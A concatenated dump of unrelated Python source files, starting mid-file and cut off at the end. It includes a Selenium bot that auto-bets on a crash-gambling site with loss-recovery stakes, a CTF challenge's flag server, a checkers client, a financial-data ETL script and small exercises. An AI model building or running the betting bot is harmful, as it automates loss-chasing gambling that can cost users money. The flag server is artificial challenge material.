inputValue:\r\n self.findPositions(PositionArray, counter + 1, inputValue)\r\n print(\"Position Array: \")\r\n print(PositionArray)\r\n\r\n def findPositions(self, PositionArray, startIndex, targetValue):\r\n for i in range(0,25):\r\n if(startIndex + i < len(self.history) and self.history[startIndex + i] < targetValue):\r\n PositionArray[i] += 1\r\n\r\n def automate(self):\r\n #betAmount = float(input(\"Enter Bet Amount: \"))\r\n cashOut = float(input(\"Enter CashOut Value: \"))\r\n #stopOnLoss = float(input(\"Enter stop on loss amount: \"))\r\n #skipNo = int(input(\"Enter number of spaces to skip on 2 losses: \"))\r\n\r\n \r\n self.startAutoBet.click()\r\n\r\n self.cash = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[1]/header/div/div[1]/div/div[2]')\r\n cashValue = self.cash.text\r\n cashValue = re.sub('[$]', '', cashValue)\r\n cashValue = float(cashValue)\r\n initialCashValue = cashValue\r\n\r\n for _ in iter(int,1):\r\n text1 = self.locationValue.text\r\n text1 = re.sub('[x]', '', text1)\r\n text2 = self.locationValue2.text\r\n text2 = re.sub('[x]', '', text2)\r\n \r\n cashValue = self.cash.text\r\n cashValue = re.sub('[$]', '', cashValue)\r\n cashValue = float(cashValue)\r\n \r\n print(\"$\" + str(cashValue))\r\n \r\n\r\n #and float(text2) < cashOut\r\n 
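            # [Comments added for clarity, summarizing the code below] When a round crashes below 2.0x, the bot
            # pauses auto-betting, waits two rounds, then places up to two manual recovery bets with a 1.07x
            # auto cash-out before resuming automated betting with a freshly sized stake from getBetAmount().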
if float(text1) < 2.0: \r\n print(\"Inside If Statement\") \r\n self.startAutoBet = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/button')\r\n self.startAutoBet.click()\r\n #wait until 2 rounds hav\r\n # e passed \r\n self.wait(2)\r\n\r\n #Place the manual bets\r\n self.manualButton = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[1]/div[1]')\r\n self.manualButton.click()\r\n \r\n self.manualBetAmount = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[1]/div/div[2]/input')\r\n self.manualBetAmount.clear()\r\n self.manualBetAmount.send_keys(self.getBetAmount(initialCashValue, 1))\r\n self.manualAutoCashOut.clear()\r\n self.manualAutoCashOut.send_keys(\"1.07\")\r\n self.startManualBet.click()\r\n \r\n self.wait(1)\r\n \r\n curr = self.locationValue.text\r\n curr = re.sub('[x]', '', curr)\r\n if float(curr) < cashOut: \r\n self.manualButton = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[1]/div[1]')\r\n self.manualButton.click() \r\n self.manualBetAmount.clear()\r\n self.manualBetAmount.send_keys(self.getBetAmount(initialCashValue, 2))\r\n self.manualAutoCashOut.clear()\r\n self.manualAutoCashOut.send_keys(\"1.07\")\r\n self.startManualBet.click()\r\n\r\n self.wait(1)\r\n\r\n\r\n self.automatedButton.click()\r\n \r\n cashValue = self.cash.text\r\n cashValue = re.sub('[$]', '', cashValue)\r\n cashValue = float(cashValue)\r\n \r\n self.autoBetAmount = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[2]/div/div[2]/input')\r\n self.autoBetAmount.clear()\r\n time.sleep(0.1)\r\n self.autoBetAmount.send_keys(self.getBetAmount(cashValue, 0))\r\n\r\n initialCashValue = cashValue\r\n time.sleep(0.1)\r\n\r\n self.startAutoBet.click()\r\n self.wait(1)\r\n \r\n \r\n time.sleep(3)\r\n\r\n def getBetAmount(self, CashAmount, currentLossStreak):\r\n Num = CashAmount - (0.06*CashAmount)\r\n initialDivisor = float(98.26/104.4)\r\n secondDivisor = float(0.34/5.78)\r\n betAmount = float(Num * initialDivisor)\r\n for counter in range(3-currentLossStreak):\r\n betAmount = betAmount * secondDivisor\r\n print(betAmount)\r\n return str(round(betAmount,4))\r\n\r\n\r\n def findInstances(self):\r\n inputValue = float(input(\"Enter value: \"))\r\n counter = 0\r\n for element in self.history:\r\n if element < 1.1:\r\n counter+=1\r\n print(counter)\r\n\r\n def wait(self, turns):\r\n currentValue = None\r\n counter = -1\r\n for _ in iter(int, 1):\r\n if currentValue != self.locationValue.text:\r\n print(\"waited a turn\")\r\n counter+=1\r\n currentValue = self.locationValue.text\r\n\r\n if counter == turns:\r\n break\r\n\r\n \r\nbot = StreakBot()\r\ntime.sleep(3)\r\nbot.login()\r\n\r\n\r\n\r\n","repo_name":"Grumblyguy/crashbot","sub_path":"dataBot.py","file_name":"dataBot.py","file_ext":"py","file_size_in_byte":9431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38202494272","text":"import os\nfrom http.server import HTTPServer\nfrom http.server import BaseHTTPRequestHandler\n\nclass MyHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-type', \"text/html\")\n self.end_headers()\n self.wfile.write(b'It works!')\n\n def do_POST(self):\n flag = os.environ.get('FLAG')\n if not flag:\n self.send_response(200)\n 
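        # [Editor's aside; illustrative only and not part of the original file.] With the server running and
        # FLAG set in the environment, the flag endpoint could be exercised like:
        #   curl -X POST http://localhost:3000/showmeflag
        # Any other POST path returns 'Idiot', a missing FLAG returns the 'Something went wrong' message,
        # and GET requests return 'It works!'.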
self.send_header('Content-Type', 'text/plain')\n self.end_headers()\n self.wfile.write(b'Something went wrong. Please call admin.')\n return\n\n if self.path != '/showmeflag':\n self.send_response(200)\n self.send_header('Content-Type', 'text/plain')\n self.end_headers()\n self.wfile.write(b'Idiot')\n return\n\n self.send_response(200)\n self.send_header('Content-Type', 'text/plain')\n self.end_headers()\n self.wfile.write(flag.encode())\n\nserver_address = ('0.0.0.0', 3000)\nhttpd = HTTPServer(server_address, MyHTTPRequestHandler)\nhttpd.serve_forever()\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/Ricerca/2023/web/ps-converter/flag/flag_server.py","file_name":"flag_server.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"69857601848","text":"import argparse\nimport gc\nimport sys\nimport json\nimport os.path\nimport random\nimport time\n\nimport checkers.heuristics as heuristics\n\ntry:\n from math import inf\nexcept ImportError:\n inf = float('inf')\n\nfrom checkers.game_api import GameOver\nfrom checkers.players import SimpleMcCartneyServerPlayer\n\nweights_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),\"weights.json\")\n\nif __name__ == \"__main__\":\n random.seed(time.time())\n parser = argparse.ArgumentParser(description='Plays a given number of games with a given opponent using the given user number.')\n parser.add_argument('-o', '--opponent', type=int, default=0, help='The opponent user number.')\n parser.add_argument('-u', '--user', type=int, default=5, help='Your user number (5 or 6).')\n parser.add_argument('-c', '--count', type=int, default=1, help='Number of consecutive games to play.')\n parser.add_argument('-w', '--weights', default=weights_file, help='File with weight constants')\n parser.add_argument('-v', '--verbose', default=False, help='\\'True\\' if you want to display each message sent between the client and server')\n args = parser.parse_args()\n final = \"\"\n error = False\n wins = 0\n losses = 0\n draws = 0\n num = 0\n total_time = 0\n max_time = 0\n min_time = 0\n\n # How many times to run a game\n count = args.count\n\n global weights\n weights = json.load(open(args.weights, 'r'))\n\n error = False\n while not error and count>0:\n start_time = time.time()\n print(\"Start {}:\".format(count))\n game = SimpleMcCartneyServerPlayer(args.opponent, args.user==6, 1 if args.verbose else 0)\n try:\n # game.start()\n while True:\n actions = game.board.list_actions()\n bestScore = -inf\n move_list = []\n if len(actions) != 0:\n if len(actions) == 1:\n result = game.recv_move(actions[0])\n if isinstance(result, GameOver):\n raise result\n else:\n for act in actions:\n score = heuristics.alphabeta_search(game.board.result(act), game._client_is_white, weights)\n if float(score) > bestScore:\n bestScore = score\n move_list = [act]\n elif score == bestScore:\n move_list.append(act)\n index = random.randint(0, len(move_list)-1)\n result = game.recv_move(move_list[index])\n if isinstance(result, GameOver):\n raise result\n else:\n error = True\n print(\"Error: No actions available.\")\n break\n except GameOver as inst:\n print(\"GameOver Exception: \", inst.result, file=sys.stderr)\n if inst.result:\n game.show_game()\n if inst.result == \"Draw\":\n draws+=1\n elif inst.result == (\"White\" if game._client_is_white else \"Black\"):\n wins+=1\n elif inst.result == (\"Black\" if game._client_is_white else \"White\"):\n losses+=1\n else:\n 
print(\"Unknown result? : \" + inst.result)\n else:\n error = True\n time_diff = time.time() - start_time\n if time_diff > max_time:\n max_time = time_diff\n if time_diff < min_time or num == 0:\n min_time = time_diff\n total_time+=time_diff\n print(\"Finished in {}s\\n\".format(time_diff))\n num+=1\n count-=1\n\n game = None\n gc.collect()\n\n # print(\"eval cache: \", eval.cache_info())\n print(\"Stats: {}w:{}d:{}l\\navg time = {}s\\nmax time = {}s\\nmin time = {}s\".format(wins, draws, losses, total_time/num, max_time, min_time))\n","repo_name":"keelimeguy/checkers-ai","sub_path":"checkers/blocking_game_example.py","file_name":"blocking_game_example.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12535388589","text":"import pandas as pd\nfrom urllib.request import urlopen\nimport certifi\nimport json\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\", category = DeprecationWarning) \n\n\n######################################################################################################################\n# NEW BLOCK - Get financial data functions\n######################################################################################################################\n\n# https://site.financialmodelingprep.com/developer/docs\n# example@gmail.com: 'key'\n\n# Get balance sheet\ndef get_balance_sheet_data(ticker, key):\n \"\"\"\n - Gets 5 years of balance sheet data per ticker\n \"\"\"\n url = (f\"https://financialmodelingprep.com/api/v3/balance-sheet-statement/{ticker}?apikey={key}\")\n response = urlopen(url, cafile = certifi.where())\n data = response.read().decode(\"utf-8\")\n return json.loads(data)\n\n# get income statement\ndef get_income_statement_data(ticker, key):\n \"\"\"\n - Gets 5 years of income statement data per ticker\n \"\"\"\n url = (f\"https://financialmodelingprep.com/api/v3/income-statement/{ticker}?apikey={key}\")\n response = urlopen(url, cafile = certifi.where())\n data = response.read().decode(\"utf-8\")\n return json.loads(data)\n\n# Get cash-flow statement\ndef get_cash_flow_statement_data(ticker, key):\n \"\"\"\n - Gets 5 years of cash-flow statement data per ticker\n \"\"\"\n url = (f\"https://financialmodelingprep.com/api/v3/cash-flow-statement/{ticker}?apikey={key}\")\n response = urlopen(url, cafile = certifi.where())\n data = response.read().decode(\"utf-8\")\n return json.loads(data)\n\n\n######################################################################################################################\n# NEW BLOCK - Run data wrangling pipeline\n######################################################################################################################\n\ndef parse_financial_api():\n \"\"\"\n - Runs API pipeline\n - Transforms data\n - Exports data to data directory as a CSV\n \"\"\"\n # Import S&P 500 Index companies\n #####################################################################################################\n tickers_df = pd.read_csv(\n r\"Data/S&P500_Index_Companies.csv\",\n sep = ',',\n encoding = 'unicode_escape'\n )\n\n # Convert tickers to list\n tickers = tickers_df['ticker'].tolist()\n companies = tickers_df['company'].tolist()\n \n # example@gmail.com: 'key'\n key = 'key' \n \n # Wrangle API\n ##################################################################################################### \n # Store parsed data\n balance_sheet_df_list = []\n income_statement_df_list = []\n 
cash_flow_statement_df_list = []\n\n for ticker, company in zip(tickers, companies):\n # Get balance sheet\n ###########################################\n balance_sheet = get_balance_sheet_data(\n ticker = ticker, \n key = key\n )\n\n # Append df\n balance_sheet = pd.DataFrame(balance_sheet)\n \n balance_sheet = balance_sheet.drop(\n ['link','finalLink'], \n axis = 1,\n errors = 'ignore'\n )\n \n balance_sheet['financialStatement'] = 'Balance Sheet'\n balance_sheet['company'] = company\n balance_sheet_df_list.append(balance_sheet)\n \n print(' '.join(['Completed balance sheet', str(ticker)]))\n\n # get income statement\n ###########################################\n income_statement = get_income_statement_data(\n ticker = ticker, \n key = key\n )\n\n # Append df\n income_statement = pd.DataFrame(income_statement)\n \n income_statement = income_statement.drop(\n ['link','finalLink'], \n axis = 1,\n errors = 'ignore'\n )\n \n income_statement['financialStatement'] = 'Income Statement'\n income_statement['company'] = company\n income_statement_df_list.append(income_statement)\n \n print(' '.join(['Completed income statement', str(ticker)]))\n\n # Get cash-flow statement\n ###########################################\n cash_flow_statement = get_cash_flow_statement_data(\n ticker = ticker, \n key = key\n )\n\n # Append df\n cash_flow_statement = pd.DataFrame(cash_flow_statement)\n \n cash_flow_statement = cash_flow_statement.drop(\n ['link','finalLink'], \n axis = 1,\n errors = 'ignore'\n )\n \n cash_flow_statement['financialStatement'] = 'Cash-Flow Statement'\n cash_flow_statement['company'] = company\n cash_flow_statement_df_list.append(cash_flow_statement)\n \n print(' '.join(['Completed cash-flow statement', str(ticker)]))\n \n time.sleep(1.5)\n\n \n # Concat all data per list\n ##################################################################################################### \n balance_sheet_df = pd.concat(balance_sheet_df_list, axis = 0)\n income_statement_df = pd.concat(income_statement_df_list, axis = 0)\n cash_flow_statement_df = pd.concat(cash_flow_statement_df_list, axis = 0)\n \n \n # Unpivot data to long form\n ##################################################################################################### \n # Balance sheet\n balance_sheet_df = pd.melt(\n balance_sheet_df,\n \n id_vars = [\n 'date',\n 'symbol',\n 'reportedCurrency',\n 'cik',\n 'fillingDate',\n 'acceptedDate',\n 'calendarYear',\n 'period',\n 'financialStatement',\n 'company'\n ], \n \n value_vars = balance_sheet_df.columns[7:-1],\n var_name = 'financialAccounts', \n value_name = 'financialValues'\n )\n\n # adjust account string to proper\n balance_sheet_df['financialAccounts'] = balance_sheet_df['financialAccounts'].str.replace( r\"([A-Z])\", r\" \\1\").str.strip().str.title()\n \n # Income statement\n income_statement_df = pd.melt(\n income_statement_df,\n \n id_vars = [\n 'date',\n 'symbol',\n 'reportedCurrency',\n 'cik',\n 'fillingDate',\n 'acceptedDate',\n 'calendarYear',\n 'period',\n 'financialStatement',\n 'company'\n ], \n \n value_vars = income_statement_df.columns[7:-1],\n var_name = 'financialAccounts', \n value_name = 'financialValues'\n )\n\n # adjust account string to proper\n income_statement_df['financialAccounts'] = income_statement_df['financialAccounts'].str.replace( r\"([A-Z])\", r\" \\1\").str.strip().str.title()\n \n # Cash-flow statement\n cash_flow_statement_df = pd.melt(\n cash_flow_statement_df,\n \n id_vars = [\n 'date',\n 'symbol',\n 'reportedCurrency',\n 'cik',\n 'fillingDate',\n 
'acceptedDate',\n 'calendarYear',\n 'period',\n 'financialStatement',\n 'company'\n ], \n \n value_vars = cash_flow_statement_df.columns[7:-1],\n var_name = 'financialAccounts', \n value_name = 'financialValues'\n )\n\n # adjust account string to proper\n cash_flow_statement_df['financialAccounts'] = cash_flow_statement_df['financialAccounts'].str.replace(r\"([A-Z])\", r\" \\1\").str.strip().str.title()\n \n # Concat all data to one data frame\n ##################################################################################################### \n df = pd.concat([balance_sheet_df, income_statement_df], axis = 0)\n df = pd.concat([df, cash_flow_statement_df], axis = 0)\n \n # rename columns\n df.columns = [\n 'date', \n 'ticker', \n 'reported_currency', \n 'cik', \n 'filling_date',\n 'accepted_date', \n 'calendar_year', \n 'period', \n 'financial_statement',\n 'company',\n 'financial_accounts',\n 'financial_values'\n ]\n \n # reorder columns to match view\n df = df[[\n 'cik',\n 'company',\n 'ticker',\n 'financial_accounts',\n 'financial_statement',\n 'date',\n 'filling_date',\n 'accepted_date',\n 'calendar_year',\n 'financial_values'\n ]]\n \n\n # Export data\n ##################################################################################################### \n df.to_csv(\n 'Data/Financial_Statement_Data.csv', \n index = False, \n encoding = 'utf8'\n ) \n \n print('Program complete')\n\nif __name__ == '__main__':\n parse_financial_api()\n \n ","repo_name":"joseppbenvenuto/S-P_500_Financial_Analysis","sub_path":"Financial_Statement_API_ETL_Pipeline/API_Financial_Statements.py","file_name":"API_Financial_Statements.py","file_ext":"py","file_size_in_byte":9323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"6439740990","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nimport pytz\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport pathlib\nimport cw_file_utils as cw_fu\nimport pkg_resources\nimport pickle\nimport gzip\n\nclass Jarvis:\n # lowercase are internal to class params\n timezone = 'America/New_York'\n startuptime = datetime.now(pytz.timezone(timezone))\n longDateFormat = \"%d-%b-%Y, %H:%M\"\n shortTimeFormat = \"%H:%M\"\n utility_files_dir = 'utility_files'\n data_dir = 'data'\n data_subdir1 = '01_original'\n data_subdir2 = '02_working'\n data_subdir3 = '03_train'\n data_subdir4 = '04_test'\n data_subdir5 = '05_experiments'\n\n data_subdirs = [data_subdir1, data_subdir2, data_subdir3, data_subdir4, data_subdir5]\n\n PROJECT_NAME = ''\n ROOT_DIR = ''\n ROOT_DATA_DIR = ''\n DATA_DIR = ''\n DATA_DIR_ORIG = ''\n DATA_DIR_WORK = ''\n DATA_DIR_TEST = ''\n DATA_DIR_TRAIN = ''\n WORKING_DIR = ''\n UTILITY_DIR = ''\n\n\n def __init__(self,\n ROOT_DIR,\n PROJECT_NAME\n ):\n\n self.ROOT_DIR = ROOT_DIR\n self.PROJECT_NAME = PROJECT_NAME\n self.UTILITY_DIR = join(self.ROOT_DIR,self.utility_files_dir)\n\n self.startup()\n #self.showenvironment()\n self.environmentScan()\n self.greeting()\n\n def startup(self):\n print(\"Wha...where am I?\")\n self.ROOT_DATA_DIR = join(self.ROOT_DIR, self.data_dir)\n self.DATA_DIR = join(self.ROOT_DATA_DIR, self.PROJECT_NAME)\n self.WORKING_DIR = join(self.ROOT_DIR, self.PROJECT_NAME)\n self.DATA_DIR_ORIG = join(self.DATA_DIR, self.data_subdir1)\n self.DATA_DIR_WORK = join(self.DATA_DIR, self.data_subdir2)\n self.DATA_DIR_TRAIN = join(self.DATA_DIR, self.data_subdir3)\n self.DATA_DIR_TEST = join(self.DATA_DIR, self.data_subdir4)\n self.DATA_DIR_EXP = 
join(self.DATA_DIR, self.data_subdir5)\n print(\"I am awake now.\")\n\n def whattimeisit(self):\n now = datetime.now(pytz.timezone(self.timezone))\n print(\"The current time is \" + now.strftime(self.shortTimeFormat))\n\n def showenvironment(self):\n print(\"I am inspecting the local environment...\")\n print('')\n print(\"Your environment has been configured: \")\n print(\"PROJECT_NAME: \" + self.PROJECT_NAME)\n print(\"ROOT_DIR: \" + self.ROOT_DIR)\n print(\"WORKING_DIR: \" + self.WORKING_DIR)\n print('')\n print(\"ROOT_DATA_DIR: \" + self.ROOT_DATA_DIR)\n print(\"DATA_DIR: \" + self.DATA_DIR)\n print(\"DATA_DIR_ORIG: \" + self.DATA_DIR_ORIG)\n print(\"DATA_DIR_WORK: \" + self.DATA_DIR_WORK)\n print(\"DATA_DIR_TRAIN: \" + self.DATA_DIR_TRAIN)\n print(\"DATA_DIR_TEST: \" + self.DATA_DIR_TEST)\n print('')\n print(\"UTILITY_DIR: \" + self.UTILITY_DIR)\n\n def displayProjects(self):\n onlyDirs = [f for f in listdir(self.ROOT_DIR) if not isfile(join(self.ROOT_DIR, f))]\n onlyDirs.sort()\n print(\"Project listing:\")\n for x in onlyDirs:\n print(\"--> \" + x)\n\n def environmentScan(self):\n self.setupWorkingDir()\n self.setupDataDir()\n\n #self.showProjectWorkFiles()\n #self.showProjectDataFiles()\n\n # Set directory to WORKING_DIR\n os.chdir(self.WORKING_DIR)\n print(\"I have set your current working directory to {0}\".format(os.getcwd()))\n\n def setupWorkingDir(self):\n if not os.path.exists(self.WORKING_DIR):\n # Create a new directory because it does not exist\n os.makedirs(self.WORKING_DIR)\n print(\"The working directory is not present. Directory created.\")\n\n def setupDataDir(self):\n if not os.path.exists(self.DATA_DIR):\n os.makedirs(self.DATA_DIR)\n print(\"The project data directory is not present. Directory created.\")\n\n for x in self.data_subdirs:\n if not(os.path.exists(join(self.DATA_DIR, x))):\n os.makedirs(join(self.DATA_DIR, x))\n print(\"Data subdirectory \" + x + \" has been created\")\n\n print('')\n\n def greeting(self):\n greeting = ''\n x = int(self.startuptime.strftime(\"%H\"))\n\n if (x > 7) and (x <= 8):\n greeting = 'An early morning I see.'\n elif (x > 8) and (x <= 12):\n greeting = 'Extra caffeine may help.'\n elif (x > 12) and (x <= 18):\n greeting = 'Reminder, no more coffee.'\n elif (x > 18) and (x <= 20):\n greeting = 'I hope you had dinner.'\n elif (x > 20) and (x <= 24):\n greeting = 'I see you are having a productive evening.'\n elif (x <= 7):\n greeting = 'You should really be sleeping.'\n\n self.whattimeisit()\n print(\"Hello sir. 
\" + greeting)\n print('')\n\n def showProjectDataFiles(self):\n print(\"Here are all your project data files\")\n cw_fu.exploreDirectory(self.DATA_DIR)\n\n def showProjectWorkFiles(self):\n print(\"Here are all your project work files\")\n cw_fu.exploreDirectory(self.WORKING_DIR)\n\n def showAllDataFiles(self):\n print(\"Here are all your available data files\")\n cw_fu.exploreDirectory(self.ROOT_DATA_DIR)\n\n def compressProjectDataFiles(self, removeOriginal=False):\n cw_fu.exploreDirectory(self.DATA_DIR, compress=True, removeOriginal=removeOriginal)\n\n def compressAllDataFiles(self, removeOriginal=False):\n cw_fu.exploreDirectory(self.ROOT_DATA_DIR, compress=True, removeOriginal=removeOriginal)\n\n def getPackageVersion(self, pkgName):\n print(pkgName + \" version: \" + str(pkg_resources.get_distribution(pkgName)))\n\n def saveExperiment(self, dataExperiment, fileName, fileExtension='.jexp'):\n pickle.dump(dataExperiment, gzip.open(f'{self.DATA_DIR_EXP}/{fileName}{fileExtension}.gz', 'wb'))\n\n def loadExperiment(self, fileName, fileExtension='.jexp'):\n obj = pickle.load(gzip.open(f'{self.DATA_DIR_EXP}/{fileName}{fileExtension}.gz', 'rb'))\n return obj\n","repo_name":"mvmagni/ML_Univ","sub_path":"utility_files/jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9679251503","text":"#!/usr/bin/python3\n\"\"\"Square\"\"\"\n\n\nclass Square:\n \"\"\"constructor\"\"\"\n def __init__(self, size=0):\n if (type(size) is not int):\n raise TypeError(\"size must be an integer\")\n if (size < 0):\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = size\n\n def area(self):\n \"\"\"\"area return\"\"\"\n return self.__size ** 2\n\n @property\n def size(self):\n \"\"\"getter\"\"\"\n return self.__size\n\n @size.setter\n def size(self, aux):\n \"\"\"setter\"\"\"\n if (type(aux) is not int):\n raise TypeError(\"size must be an integer\")\n if (aux < 0):\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = aux\n\n def my_print(self):\n \"\"\"prints # for each size value\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__size):\n print(\"#\" * self.__size)\n","repo_name":"balbinxx/holbertonschool-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37914414217","text":"import threading\nimport socket\n\nclass ClientHandler(threading.Thread):\n def __init__(self, comm_socket, likeliestClassValue):\n super(ClientHandler, self).__init__()\n self.comm_socket = comm_socket\n self.likeliestClassValue = likeliestClassValue\n\n def run(self):\n #print(\"started thread\")\n data = self.comm_socket.send(bytes(str(self.likeliestClassValue), \"utf-8\"))\n self.comm_socket.close()\n\n\n#def serverProcess(host_addr, likeliestClass, classCounter):\ndef serverProcess(host_addr, likeliestClass, classCounter, inferenceLock):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind(host_addr)\n s.listen()\n print(\"server listening on\", host_addr)\n while True:\n comm_socket, comm_addr = s.accept()\n # read likeliest class\n inferenceLock.acquire()\n likeliestClass.acquire()\n likeliestClassValue = likeliestClass.value\n likeliestClass.release()\n inferenceLock.release()\n\n # clean the counter as we're now going to infer the next symbol\n 
classCounter.acquire()\n for i in range(len(classCounter)):\n classCounter[i] = 0\n classCounter.release()\n handler_thread = ClientHandler(comm_socket, likeliestClassValue)\n handler_thread.start()\n","repo_name":"mmguberina/HUMROgroup5","sub_path":"serverProcess.py","file_name":"serverProcess.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11026051112","text":"from typing import Optional, List\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def postorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n if not root:\n return []\n return self.postorderTraversal(root.left) + self.postorderTraversal(root.right) + [root.val]\n \n\nclass Solution:\n def postorderTraversal(self, root: TreeNode) -> List[int]:\n if not root:\n return list()\n \n res = list()\n stack = list()\n prev = None\n\n while root or stack:\n while root:\n stack.append(root)\n root = root.left\n root = stack.pop()\n # Each node is pushed and popped twice: the first time to visit its right subtree, the second time for the node itself (the root)\n # If there is no right subtree, or the right subtree has already been visited, this root node can be recorded\n # Note: set root to None to mark both subtrees as visited and prevent descending further\n if not root.right or root.right == prev:\n res.append(root.val)\n prev = root\n root = None\n else:\n stack.append(root)\n root = root.right\n \n return res\n \n\ndef stringToTreeNode(input):\n input = input.strip()\n input = input[1:-1]\n if not input:\n return None\n\n inputValues = [s.strip() for s in input.split(',')]\n root = TreeNode(int(inputValues[0]))\n nodeQueue = [root]\n front = 0\n index = 1\n while index < len(inputValues):\n node = nodeQueue[front]\n front = front + 1\n\n item = inputValues[index]\n index = index + 1\n if item != \"null\":\n leftNumber = int(item)\n node.left = TreeNode(leftNumber)\n nodeQueue.append(node.left)\n\n if index >= len(inputValues):\n break\n\n item = inputValues[index]\n index = index + 1\n if item != \"null\":\n rightNumber = int(item)\n node.right = TreeNode(rightNumber)\n nodeQueue.append(node.right)\n return root\n\n\nsol = Solution()\nprint(sol.postorderTraversal(root = stringToTreeNode(\"[1,null,2,3]\")))","repo_name":"sea72/myLeetCode","sub_path":"binary_tree/145_postorder.py","file_name":"145_postorder.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29331116489","text":"# Credit approval\ningreso = int(input(\"Ingreso: \"))\nano_nacimiento = int(input(\"Año de nacimiento: \"))\nnumero_hijos = int(input(\"Cantidad de hijos: \"))\nantiguedad_banco = int(input(\"Años de pertenencia al banco: \"))\nestado_civil = input(\"S: soltero, C: casado: \")\ncampo_cuidad = input(\"U: urbano, R: rural: \")\n\nedad = 2020 - ano_nacimiento\n\nif antiguedad_banco > 10 and numero_hijos >= 2:\n\tprint(\"APROBADO\")\n\nelif (estado_civil == \"C\" or estado_civil == \"c\") and numero_hijos > 3 and 45 <= edad <= 55:\n\tprint(\"APROBADO\")\n\nelif ingreso > 2500000 and (estado_civil == \"S\" or estado_civil == \"s\") and (campo_cuidad == \"U\" or campo_cuidad == \"u\"):\n\tprint(\"APROBADO\")\n\nelif ingreso > 3500000 and antiguedad_banco > 5:\n\tprint(\"APROBADO\")\n\nelif (campo_cuidad == \"R\" or campo_cuidad == \"r\") and (estado_civil == \"C\" or estado_civil == \"c\") and numero_hijos < 
2:\n\tprint(\"APROBADO\")\n\nelse:\n\tprint(\"Rechazado\")","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_c577f6fd2a0676d6dd8e78e7e3c42b93.py","file_name":"hito1_ej3_c577f6fd2a0676d6dd8e78e7e3c42b93.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35015215556","text":"\"\"\"\n@author : Anil kumar Reddy\n@Date : 24th sep 2020\n\"\"\"\n\nenv = \"dev\"\n\ndef get_db_configs():\n if env==\"dev\":\n port_number = 27017\n host = \"127.0.0.1\"\n else:\n port_number = 27017\n host = \"127.0.0.1\"\n return port_number,host\n\n\ndb = \"socialmedia\"\napp_users = \"app_users\"\nstreem_config = \"streem_config\"\nuser_timeline = \"user_timeline\"\nserach_keywords = \"serach_keywords\"\n","repo_name":"kunduruanil/SocialMedia","sub_path":"configration/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7490549140","text":"import matplotlib.pyplot as plt\nimport time\nimport subprocess\nimport os\n\n\ndef graph(title, x_label, y_label, x, y, legend_label = None):\n\n plt.title(title)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n\n if not legend_label:\n plt.plot(x, y, marker = 'o')\n else:\n plt.plot(x, y, marker = 'o', label = legend_label)\n plt.legend(title = 'n', loc = \"upper right\")\n\n if not legend_label:\n plt.savefig(\"graph_logs/{}.png\".format(title.replace(', ', '_')))\n plt.clf()\n\nif __name__ == \"__main__\":\n\n os.system(\"make clean && make\")\n os.makedirs(\"graph_logs\", exist_ok = True)\n\n # graph 1: n-bit smith counter\n x = [i for i in range(1, 7)]\n y = {\n \"gcc_trace.txt\": [], \n \"jpeg_trace.txt\": [], \n \"perl_trace.txt\": []\n }\n\n g1_count = 0\n\n for benchmark in y.keys():\n for b in x:\n mispred_rate = subprocess.run(\n [\"./sim\", \"smith\", str(b), benchmark, '1'], \n capture_output = True\n ).stdout\n\n mispred_rate = float(mispred_rate)\n y[benchmark].append(mispred_rate)\n\n print(\"(graph 1 - Smith): b = {} | benchmark = {}\\t | misprediction rate: {}\".format(b, benchmark, mispred_rate))\n g1_count += 1\n\n print('-' * 85)\n\n print(\"GRAPH 1 (Smith) SIMULATIONS RUN: \", g1_count)\n\n for benchmark in 